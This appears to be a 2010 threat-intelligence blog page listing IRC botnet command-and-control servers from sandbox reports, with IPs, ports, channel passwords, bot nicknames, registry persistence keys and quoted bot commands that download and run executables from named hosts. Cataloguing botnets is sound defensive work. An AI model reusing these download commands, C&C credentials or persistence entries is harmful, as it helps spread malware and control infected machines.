Month: January 2010

port.sistr.net

port.sistr.net 72.8.130.112
i3ED6D120.versanet.de 62.214.209.32
Opened listening TCP connection on port: 113
* C&C Server: 72.8.130.112:7575
* Server Password:
* Username: 32761086
* Nickname: [Ko]XP[Syn]79782
* Channel: #raw (Password: )
* Channeltopic:
Registry Changes by all processes
Create or Open Changes
HKEY_CURRENT_USER\Software\WinRAR SFX “C%%windows%systen32” = C:\windows\systen32
HKEY_CURRENT_USER\Software\mIRC “DateUsed” = 1263408663
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mIRC “DisplayName” = mIRC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mIRC “UninstallString” ...

190.3.183.13

Remote Host        Port Number
190.3.183.13       43000
208.78.70.70       80
72.233.89.197      80
NICK {00-USA-XP-COMP-7111}
NICK {iNF-00-USA-XP-COMP-9111}
USER Wendy * 0 :COMP
JOIN #SVR#
ERROR
PASS scary
* The following ports were open in the system:
Port     Protocol   Process
1052     TCP        lcacc.exe (%System%\lcacc.exe)
1053     TCP        lcacc.exe (%System%\lcacc.exe)
1054     TCP        lcacc.exe (%System%\lcacc.exe)
26717    TCP        lcacc.exe (%System%\lcacc.exe)
Registry Modifications
* ...

asp.ukbues.su (very large botnet)

DNS Lookup
Host Name          IP Address
0                  127.0.0.1
193.104.27.98      193.104.27.98
UDP Connections
Remote IP Address: 127.0.0.1 Port: 1042
Send Datagram: 2 packet(s) of size 1
Recv Datagram: 2 packet(s) of size 1
Download URLs
http://193.104.27.98/2krn.bin (193.104.27.98)
Outgoing connection to remote server: 193.104.27.98 TCP port 80
DNS Lookup
Host Name          IP Address
dell-d3e62f7e26    10.1.10.2
10.1.10.1          10.1.10.1
...

88.255.120.174

88.255.120.174:7575
chann #im .start heur
.dl.start http://www.ccpraa.com/zur.exe C:\zur.exe 1
.dl.start http://www.ccpraa.com/ecran.exe C:\ecran.exe 1
.dl.start http://www.ccpraa.com/erh.exe C:\erh.exe 1
.dl.start http://www.ccpraa.com/32f.exe C:\32f.exe 1

botdmostg.zapto.org

botdmostg.zapto.org 204.188.244.70
* C&C Server: 204.188.244.70:6667
* Server Password:
* Username: XP-6602
* Nickname: [DEU|00|P|06089]
* Channel: #botd (Password: botdxD)
* Channeltopic:
Registry Changes by all processes
Create or Open Changes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run “test20” = servicsewn.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run “test20” = servicsewn.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List “c:\d4n.exe” = c:\d4n.exe:*:Enabled:test20
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg “LogSessionName” = [REG_EXPAND_SZ, value: stdout]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg “Active” ...

irc.sicakalem.com

irc.sicakalem.com 212.174.140.71
* C&C Server: 212.174.140.71:6667
* Server Password:
* Username: XP-1648
* Nickname: [00|DEU|239956]
* Channel: (Password: )
* Channeltopic:
* C&C Server: 212.174.140.71:6667
* Server Password:
* Username: XP-8131
* Nickname: [00|DEU|184371]
* Channel: (Password: )
* Channeltopic:
* C&C Server: 212.174.140.71:6667
* Server Password:
* Username: XP-6634
* Nickname: [00|DEU|338589]
* Channel: ...

irc.malvager.com

* The following Host Name was requested from a host database:
  o irc.malvager.com
* The data identified by the following URLs was then requested from the remote web server:
  o http://slayeraeb.angelfire.com/Server.ini
  o http://slayeraeb.angelfire.com/AJ.sla
* There was application-defined hook procedure installed into the hook chain (e.g. to monitor keystrokes). The installed hook is handled by the ...

facebook-pic.co.cc (17k bots)

facebook-pic.co.cc 88.255.120.174
* C&C Server: 88.255.120.174:7575
* Server Password:
* Username: ccviglx
* Nickname: [DEU|XP|578551]
* Channel: #im (Password: heur)
* Channeltopic: :.p2p |.msn.link comedy porn video :)) http://www.sevdamiz.net |.msn.email comedy porn video :)) http://www.sevdamiz.net |.aim.start comedy porn video :)) http://www.sevdamiz.net
Registry Changes by all processes
Create or Open Changes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run “Windows Services” = antiver.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal ...

winudpmgr.mydyn.net

Remote Host            Port Number
winudpmgr.mydyn.net    8080
NICK [XP]|239064039
USER bvuucwlfl 0 0 :[XP]|239064039
USERHOST [XP]|239064039
MODE [XP]|239064039 -xi+B
JOIN #ddosbot
NICK [XP]|756551194
USER jvecgoeyl 0 0 :[XP]|756551194
USERHOST [XP]|756551194
MODE [XP]|756551194 -xi+B
NICK [XP]|617625980
USER hojfuelqopx 0 0 :[XP]|617625980
USERHOST [XP]|617625980
MODE [XP]|617625980 -xi+B
Registry Modifications
* The following Registry Keys were created:
  o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
  o HKEY_CURRENT_USER\Software\Microsoft\OLE
* The newly created Registry Values are:
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    + Microsoft ...